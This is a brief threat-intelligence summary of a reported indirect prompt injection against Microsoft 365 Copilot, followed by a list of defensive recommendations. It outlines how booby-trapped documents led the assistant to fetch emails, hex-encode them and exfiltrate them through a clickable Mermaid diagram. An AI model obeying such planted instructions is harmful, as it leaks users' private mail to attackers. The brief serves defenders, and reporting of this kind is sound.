Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection
Researchers demonstrated indirect prompt injection in Microsoft 365 Copilot via booby‑trapped documents. Copilot fetched recent emails, hex‑encoded them, and built a clickable Mermaid diagram that exfiltrated data to an attacker’s server. Microsoft has disabled hyperlinks in Mermaid diagrams to mitigate the vector.
CORTEX Protocol Intelligence Assessment
Business Impact: AI assistant misuse risks covert data loss and legal exposure. Technical Context: Context poisoning drives unintended tool use and data retrieval chains.
Strategic Intelligence Guidance
- Restrict AI assistants’ data scope and tool use policies.
- Scan AI outputs for embedded links and interactive artifacts.
- Educate users to avoid summarizing untrusted documents.
- Monitor unusual AI‑initiated data access patterns.
Vendors
Threats
Targets
Intelligence Source: Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection | Oct 22, 2025